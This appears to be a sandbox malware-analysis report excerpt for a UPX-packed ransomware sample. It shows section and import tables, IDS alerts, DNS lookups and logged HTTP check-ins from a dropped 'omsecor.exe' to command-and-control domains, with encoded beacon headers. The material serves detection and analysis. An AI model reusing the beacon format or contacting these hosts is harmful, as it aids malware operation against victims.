                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                UPX00x10000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                UPX10x230000x90000x88000a37ff92c9244f27273c00df63b5aeedFalse0.98779296875data7.909688451472698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                UPX20x2c0000x10000x200f7ad827edeffa7b703cdfd6c8aa7c086False0.544921875data3.9687619393335836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLLImport
                ADVAPI32.dllRegCloseKey
                KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                ole32.dllCoInitialize
                OLEAUT32.dllVariantClear
                SHELL32.dllSHGetFolderPathW
                SHLWAPI.dllStrStrIW
                USER32.dllSetParent
                WININET.dllInternetOpenW
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-09-08T06:09:37.850228+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449749193.166.255.17180TCP
                2024-09-08T06:09:37.868813+02002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.449730193.166.255.17180TCP
                2024-09-08T06:09:38.569119+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449730193.166.255.17180TCP
                2024-09-08T06:10:00.064197+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449731193.166.255.17180TCP
                2024-09-08T06:10:00.848191+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44973864.225.91.7380TCP
                2024-09-08T06:10:01.919056+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44973952.34.198.22980TCP
                2024-09-08T06:10:01.919142+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.449739TCP
                2024-09-08T06:10:01.919142+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.449739TCP
                2024-09-08T06:10:23.623919+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449740193.166.255.17180TCP
                2024-09-08T06:10:45.111484+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449741193.166.255.17180TCP
                2024-09-08T06:10:45.834962+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974364.225.91.7380TCP
                2024-09-08T06:10:46.699343+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974452.34.198.22980TCP
                2024-09-08T06:11:08.188034+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449745193.166.255.17180TCP
                2024-09-08T06:11:29.708209+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449746193.166.255.17180TCP
                2024-09-08T06:11:30.431154+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974764.225.91.7380TCP
                2024-09-08T06:11:31.264187+02002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974852.34.198.22980TCP
                TimestampSource PortDest PortSource IPDest IP
                Sep 8, 2024 06:09:37.868813038 CEST4973080192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:37.873640060 CEST8049730193.166.255.171192.168.2.4
                Sep 8, 2024 06:09:37.873740911 CEST4973080192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:37.874025106 CEST4973080192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:37.878842115 CEST8049730193.166.255.171192.168.2.4
                Sep 8, 2024 06:09:38.568983078 CEST8049730193.166.255.171192.168.2.4
                Sep 8, 2024 06:09:38.569118977 CEST4973080192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:38.569185972 CEST4973080192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:38.573942900 CEST8049730193.166.255.171192.168.2.4
                Sep 8, 2024 06:09:38.678809881 CEST4973180192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:38.683886051 CEST8049731193.166.255.171192.168.2.4
                Sep 8, 2024 06:09:38.683988094 CEST4973180192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:38.684099913 CEST4973180192.168.2.4193.166.255.171
                Sep 8, 2024 06:09:38.688827038 CEST8049731193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:00.064033985 CEST8049731193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:00.064197063 CEST4973180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:00.064429045 CEST4973180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:00.069154024 CEST8049731193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:00.228801966 CEST4973880192.168.2.464.225.91.73
                Sep 8, 2024 06:10:00.233632088 CEST804973864.225.91.73192.168.2.4
                Sep 8, 2024 06:10:00.233724117 CEST4973880192.168.2.464.225.91.73
                Sep 8, 2024 06:10:00.233843088 CEST4973880192.168.2.464.225.91.73
                Sep 8, 2024 06:10:00.238615990 CEST804973864.225.91.73192.168.2.4
                Sep 8, 2024 06:10:00.848057985 CEST804973864.225.91.73192.168.2.4
                Sep 8, 2024 06:10:00.848191023 CEST4973880192.168.2.464.225.91.73
                Sep 8, 2024 06:10:01.176980019 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.181814909 CEST804973952.34.198.229192.168.2.4
                Sep 8, 2024 06:10:01.181921959 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.182065964 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.186829090 CEST804973952.34.198.229192.168.2.4
                Sep 8, 2024 06:10:01.918982983 CEST804973952.34.198.229192.168.2.4
                Sep 8, 2024 06:10:01.919055939 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.919142008 CEST804973952.34.198.229192.168.2.4
                Sep 8, 2024 06:10:01.919186115 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.922857046 CEST4973980192.168.2.452.34.198.229
                Sep 8, 2024 06:10:01.927676916 CEST804973952.34.198.229192.168.2.4
                Sep 8, 2024 06:10:02.237103939 CEST4973880192.168.2.464.225.91.73
                Sep 8, 2024 06:10:02.237821102 CEST4974080192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:02.242651939 CEST8049740193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:02.242733002 CEST4974080192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:02.242902994 CEST4974080192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:02.247637033 CEST8049740193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:23.623823881 CEST8049740193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:23.623919010 CEST4974080192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:23.624063969 CEST4974080192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:23.628832102 CEST8049740193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:23.741519928 CEST4974180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:23.746465921 CEST8049741193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:23.746572018 CEST4974180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:23.746695995 CEST4974180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:23.751492977 CEST8049741193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:45.111398935 CEST8049741193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:45.111484051 CEST4974180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:45.111617088 CEST4974180192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:45.116381884 CEST8049741193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:45.229593039 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:10:45.234468937 CEST804974364.225.91.73192.168.2.4
                Sep 8, 2024 06:10:45.234572887 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:10:45.234721899 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:10:45.239470959 CEST804974364.225.91.73192.168.2.4
                Sep 8, 2024 06:10:45.834861040 CEST804974364.225.91.73192.168.2.4
                Sep 8, 2024 06:10:45.834961891 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:10:45.964600086 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:45.969512939 CEST804974452.34.198.229192.168.2.4
                Sep 8, 2024 06:10:45.969590902 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:45.969717979 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:45.974445105 CEST804974452.34.198.229192.168.2.4
                Sep 8, 2024 06:10:46.699193954 CEST804974452.34.198.229192.168.2.4
                Sep 8, 2024 06:10:46.699304104 CEST804974452.34.198.229192.168.2.4
                Sep 8, 2024 06:10:46.699342966 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:46.699381113 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:46.700825930 CEST4974480192.168.2.452.34.198.229
                Sep 8, 2024 06:10:46.705569029 CEST804974452.34.198.229192.168.2.4
                Sep 8, 2024 06:10:46.804280043 CEST4974580192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:46.809113026 CEST8049745193.166.255.171192.168.2.4
                Sep 8, 2024 06:10:46.809205055 CEST4974580192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:46.809555054 CEST4974580192.168.2.4193.166.255.171
                Sep 8, 2024 06:10:46.814285994 CEST8049745193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:08.187849045 CEST8049745193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:08.188034058 CEST4974580192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:08.190496922 CEST4974580192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:08.196855068 CEST8049745193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:08.304382086 CEST4974680192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:08.309269905 CEST8049746193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:08.309390068 CEST4974680192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:08.309528112 CEST4974680192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:08.314253092 CEST8049746193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:29.708012104 CEST8049746193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:29.708209038 CEST4974680192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:29.708329916 CEST4974680192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:29.713083982 CEST8049746193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:29.819756031 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:11:29.820064068 CEST4974780192.168.2.464.225.91.73
                Sep 8, 2024 06:11:29.827574015 CEST804974764.225.91.73192.168.2.4
                Sep 8, 2024 06:11:29.827599049 CEST804974364.225.91.73192.168.2.4
                Sep 8, 2024 06:11:29.827713966 CEST4974380192.168.2.464.225.91.73
                Sep 8, 2024 06:11:29.827929974 CEST4974780192.168.2.464.225.91.73
                Sep 8, 2024 06:11:29.828027964 CEST4974780192.168.2.464.225.91.73
                Sep 8, 2024 06:11:29.832746029 CEST804974764.225.91.73192.168.2.4
                Sep 8, 2024 06:11:30.431056023 CEST804974764.225.91.73192.168.2.4
                Sep 8, 2024 06:11:30.431154013 CEST4974780192.168.2.464.225.91.73
                Sep 8, 2024 06:11:30.539360046 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:30.544280052 CEST804974852.34.198.229192.168.2.4
                Sep 8, 2024 06:11:30.544382095 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:30.544548988 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:30.549633026 CEST804974852.34.198.229192.168.2.4
                Sep 8, 2024 06:11:31.263989925 CEST804974852.34.198.229192.168.2.4
                Sep 8, 2024 06:11:31.264187098 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:31.264245033 CEST804974852.34.198.229192.168.2.4
                Sep 8, 2024 06:11:31.264298916 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:31.264935017 CEST4974880192.168.2.452.34.198.229
                Sep 8, 2024 06:11:31.269644022 CEST804974852.34.198.229192.168.2.4
                Sep 8, 2024 06:11:31.461023092 CEST4974780192.168.2.464.225.91.73
                Sep 8, 2024 06:11:31.482765913 CEST4974980192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:31.487654924 CEST8049749193.166.255.171192.168.2.4
                Sep 8, 2024 06:11:31.487795115 CEST4974980192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:31.488007069 CEST4974980192.168.2.4193.166.255.171
                Sep 8, 2024 06:11:31.492760897 CEST8049749193.166.255.171192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Sep 8, 2024 06:09:37.850228071 CEST4924753192.168.2.41.1.1.1
                Sep 8, 2024 06:09:37.863498926 CEST53492471.1.1.1192.168.2.4
                Sep 8, 2024 06:10:00.189300060 CEST5187053192.168.2.41.1.1.1
                Sep 8, 2024 06:10:00.227742910 CEST53518701.1.1.1192.168.2.4
                Sep 8, 2024 06:10:00.962553978 CEST4930453192.168.2.41.1.1.1
                Sep 8, 2024 06:10:01.175406933 CEST53493041.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Sep 8, 2024 06:09:37.850228071 CEST192.168.2.41.1.1.10x5738Standard query (0)lousta.netA (IP address)IN (0x0001)false
                Sep 8, 2024 06:10:00.189300060 CEST192.168.2.41.1.1.10xf579Standard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
                Sep 8, 2024 06:10:00.962553978 CEST192.168.2.41.1.1.10xbf57Standard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Sep 8, 2024 06:09:37.863498926 CEST1.1.1.1192.168.2.40x5738No error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
                Sep 8, 2024 06:10:00.227742910 CEST1.1.1.1192.168.2.40xf579No error (0)mkkuei4kdsz.com64.225.91.73A (IP address)IN (0x0001)false
                Sep 8, 2024 06:10:01.175406933 CEST1.1.1.1192.168.2.40xbf57No error (0)ow5dirasuek.com52.34.198.229A (IP address)IN (0x0001)false
                • lousta.net
                • mkkuei4kdsz.com
                • ow5dirasuek.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730193.166.255.171806644C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:09:37.874025106 CEST186OUTGET /303/619.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449731193.166.255.171806644C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:09:38.684099913 CEST186OUTGET /895/196.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.44973864.225.91.73806644C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:00.233843088 CEST191OUTGET /100/325.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:00.848057985 CEST816INHTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:10:00 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.44973952.34.198.229806644C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:01.182065964 CEST191OUTGET /179/569.html HTTP/1.1
                From: 133702421766157995
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:01.918982983 CEST413INHTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:10:01 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.449740193.166.255.171803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:02.242902994 CEST186OUTGET /467/386.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.449741193.166.255.171803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:23.746695995 CEST185OUTGET /976/76.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.44974364.225.91.73803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:45.234721899 CEST190OUTGET /130/71.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:10:45.834861040 CEST816INHTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:10:45 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.44974452.34.198.229803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:45.969717979 CEST295OUTGET /59/409.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0
                Sep 8, 2024 06:10:46.699193954 CEST337INHTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:10:46 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.449745193.166.255.171803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:10:46.809555054 CEST186OUTGET /347/423.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.449746193.166.255.171803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:11:08.309528112 CEST186OUTGET /601/938.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.44974764.225.91.73803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:11:29.828027964 CEST190OUTGET /88/221.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Sep 8, 2024 06:11:30.431056023 CEST816INHTTP/1.1 200 OK
                server: nginx/1.18.0 (Ubuntu)
                date: Sun, 08 Sep 2024 04:11:30 GMT
                content-type: text/html
                content-length: 593
                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                etag: "63f68860-251"
                accept-ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.44974852.34.198.229803868C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Sep 8, 2024 06:11:30.544548988 CEST297OUTGET /968/405.html HTTP/1.1
                From: 133702422009751771
                Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0
                Sep 8, 2024 06:11:31.263989925 CEST337INHTTP/1.1 200 OK
                Server: nginx
                Date: Sun, 08 Sep 2024 04:11:31 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768691|1725768601|33|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


